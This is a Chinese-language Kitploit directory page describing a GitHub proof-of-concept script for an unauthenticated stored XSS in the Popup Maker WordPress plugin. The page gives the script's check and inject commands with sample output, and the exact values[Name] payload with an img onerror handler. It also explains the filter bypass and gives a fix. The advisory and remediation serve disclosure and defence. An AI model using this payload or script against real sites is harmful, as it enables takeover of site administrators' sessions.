Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/pwnvader/cve-2026-87915-poc-pwnvader
漏洞扫描器Web漏洞扫描器漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubpwnvader/cve-2026-87915-poc-pwnvader

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

CVE-2026-87915-PoC-pwnVader

针对 CVE-2026-87915 的 Shell PoC,该漏洞是 Popup Maker WordPress 插件(<=1.24.0)中的未认证存储型 XSS。可对插件进行指纹识别并演示载荷注入。

查看仓库
14天前尚未审核
分享

CVE-2026-87915 — Popup Maker <= 1.24.0 — 未认证存储型 XSS(values[Name])

作者: pwnVader · 许可证: MIT(仓库根目录)

组件Popup Maker – Boost Sales, Conversions, Optins, Subscribers(WordPress 插件)
类型CWE-79 — 存储型跨站脚本
受影响版本<= 1.24.0
修复版本1.25.0
CVECVE-2026-87915 — CVSS 3.1 7.2(AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)
PoCpoc.sh

概述

Popup Maker 的公开 optin/newsletter 表单接受 values[Name] 参数且未进行 清理(action=pum_sub_form)。该值被存储在服务端,随后在管理员的 Subscribers 界面中 渲染。在此上下文中,输出时应用的 wp_kses() 过滤并不充分:允许的属性值内部的 HTML 实体 在规范化后仍然存在,并在管理员点击上下文帮助标签锚点时,被 wp-admin/js/common.js 中的 jQuery( link.attr('href') ) DOM 接收点执行。最终效果:针对管理员的未认证存储型 XSS (管理员侧需要点击一次)。

用法

root@kitploit:~
# Interactive menu
./poc.sh

# Read-only: fingerprint the plugin and detect a public subscribe form
./poc.sh check --target https://example.com

# Store the payload (writes ONE subscriber row; requires authorization)
./poc.sh inject --target https://example.com --authorized

inject 默认使用唯一的测试邮箱,并打印清理步骤(管理员界面或 DELETE FROM wp_pum_subscribers WHERE email = '…';)。

示例输出(check)

root@kitploit:~
== CVE-2026-87915 PoC (check) ==
target: https://example.com

[1] Plugin fingerprint (read-only)
  [PASS] Popup Maker assets are served (plugin installed)
  [info] detected version: 1.22.0
  [PASS] version 1.22.0 is in the affected range (<= 1.24.0)

[2] Public subscribe form detection (read-only)
  [PASS] Popup Maker markup found on the site (a public form may accept values[Name])

示例输出(inject,实验环境)

root@kitploit:~
[3] Stored injection via pum_sub_form (writes one subscriber row)
  response: {"success":true,"data":{"message":"You have been subscribed!"}}
  [PASS] the server accepted and stored the payload unauthenticated

绕过方式,一行说明

root@kitploit:~
values[Name] = <a href="https://github.com/pwnvader/cve-2026-87915-poc-pwnvader/blob/main/%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E">VDP-XSS-PROOF</a>
  • values[name](小写)是正常字段;大小写混合的 values[Name] 在 PHP 数组键规范化过程中发生冲突,从而将载荷带入。
  • wp_kses() 允许 <a href> 元素;属性内部实体编码的 `` 在 过滤后仍然存在,并在之后被解码/规范化。
  • wp-admin/js/common.js 执行 jQuery( link.attr('href') ),它会解析解码后的 HTML 并触发 onerror 处理程序。

修复建议

  • 将 Popup Maker 更新至 1.25.0 或更高版本(对存储值使用 esc_html() + sanitize_text_field(); 参见供应商针对 classes/Admin/Subscribers/Table.php 的变更集)。
  • 临时措施:限制/禁用公开订阅者表单,或在 WAF 层面过滤 values[Name]。

参考资料

  • NVD — CVE-2026-87915: https://nvd.nist.gov/vuln/detail/CVE-2026-87915
  • 供应商修复:Popup Maker 1.25.0(插件 Trac 变更集 3690634)

免责声明

仅用于授权的安全测试。check 为只读;inject 仅创建一行测试 订阅者记录 — 之后请使用打印出的清理命令将其删除。

下载工具